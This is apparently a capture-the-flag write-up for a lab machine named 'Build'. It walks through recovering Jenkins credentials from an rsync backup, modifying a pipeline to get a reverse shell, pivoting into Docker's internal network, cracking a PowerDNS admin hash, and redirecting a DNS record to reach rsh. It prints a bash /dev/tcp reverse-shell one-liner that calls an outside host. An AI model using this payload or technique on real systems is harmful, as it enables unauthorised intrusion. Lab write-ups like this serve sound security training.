Build is an easy difficulty machine, Where I had to get credentials from a backup file, access the internal network and add new records in order to bypass the docker container.

Enumeration

The Nmap scan shows the following ports.
nmap -p- --min-rate=10000 10.10.67.89

nmap -sC -sV -p21,23,80 10.10.67.89 -oA ./nmap/Build

|Ports|Service
|22| ssh OpenSSH 8.9p1 Ubuntu
|53| Domain PowerDNS
|512| exec
|513| login
|514| shell Netkit rshd
|873| rsync
|3000| ppp?
|3306| mysql
|8081| blackice-icecap

Default creds on ssh didn’t work. And MySQL and Rlogin weren’t reachable.

Next, I visited Port 3000 and Found Gitea, a self-hosted git service.

After registering to the platform I checked the company repository and found dev repository by buildadm which seems like a Jenkins project.

Next, I check rsync to check the share in port 873 and Found a Jenkins backup file.

rsync -av rsync://10.10.67.89/backups

rsync -av rsync://10.10.67.89/backups .

Foothold

In my research of Jenkins, I found out that to decrypt secrets I need master.key, hudson.util.Secret and the XML file containing the secrets. I can also use Jenkin_offline_decryptor to decrypt the secret.

HackTricks Cloud

After decrypting the files found in the backup I got the password of buildadm.

Now after logging into the website I can edit the script and get reverse shell after waiting for a little bit.
sh ''' bash -c 'bash -i >& /dev/tcp/10.8.2.110/1234' '''

Jenkins-rce-modifying-pipeline

Docker Escape

Inside the home directory, I found rhosts file which contained some server names. I’m likely inside a docker container.

Next, I used Chisel in order to connect to internal running services.




I also made sure to change proxychains config file

A lot of the core binary/functions are missing in the docker. I went back to the website and found the internal IP address inside the webhook.

Now I can scan the internal ports.

Default creds can get us access to MySql server.

After enumerating the databases I got the admin hash and more services that are running inside.

1
2
3
4
5
6
7
8
9
10
11
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+ 
| information_schema | 
| mysql              | 
| performance_schema | 
| powerdnsadmin      | 
| sys                | 
+--------------------+ 
5 rows in set (0.130 sec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
MariaDB [powerdnsadmin]> SHOW TABLES;
+-------------------------+
| Tables_in_powerdnsadmin |
+-------------------------+
| account                 |
| account_user            |
| alembic_version         |
| apikey                  |
| apikey_account          |
| comments                |
| cryptokeys              |
| domain                  |
| domain_apikey           |
| domain_setting          |
| domain_template         |
| domain_template_record  |
| domain_user             |
| domainmetadata          |
| domains                 |
| history                 |
| records                 |
| role                    |
| sessions                |
| setting                 |
| supermasters            |
| tsigkeys                |
| user                    |
+-------------------------+
23 rows in set (0.130 sec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
MariaDB [powerdnsadmin]> SELECT * FROM user;
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password                                                     | firstname | lastname | email          | otp_secret | role_id | confirmed |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
|  1 | admin    | $2b$12$s1hK0o7YSc2<...SNIP...>.hsEq | admin     | admin    | [email protected] | NULL       |       1 |         0 |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
1 row in set (0.128 sec)    
MariaDB [powerdnsadmin]> SELECT * FROM records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name                 | type | content                                                                                  | ttl  | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
|  8 |         1 | db.build.vl          | A    | 172.18.0.4                                                                               |   60 |    0 |        0 | NULL      |    1 |
|  9 |         1 | gitea.build.vl       | A    | 172.18.0.2                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 10 |         1 | intern.build.vl      | A    | 172.18.0.1                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 11 |         1 | jenkins.build.vl     | A    | 172.18.0.3                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 12 |         1 | pdns-worker.build.vl | A    | 172.18.0.5                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 13 |         1 | pdns.build.vl        | A    | 172.18.0.6                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 14 |         1 | build.vl             | SOA  | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 |    0 |        0 | NULL      |    1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
7 rows in set (0.129 sec)

I started scanning the newly found IPs.


PowerDNS running on 172.18.0.6 and the login page was exposed as well.

To access the internal website in the browser I had to create a new socks5 config in ForxyProxy.

Now Im able to to access the website’s login page.

I used Hashcat to crack the hash and got the admin password.

After logging in with the admin creds I presented with the zone management dashboard of build.vl.


I can redirect the internal admin.build.vl to my IP by adding a new record in the zone management.
Now I will be able to access the main machine instead of the container.

Using Metasploit rlogin_login module I check to see if default cred combinations work and if root with no passwords can log in.

Now I can log in using rsh client.

Note: Kali removed rsh client, In order to install sudo apt-get install rsh-redone-client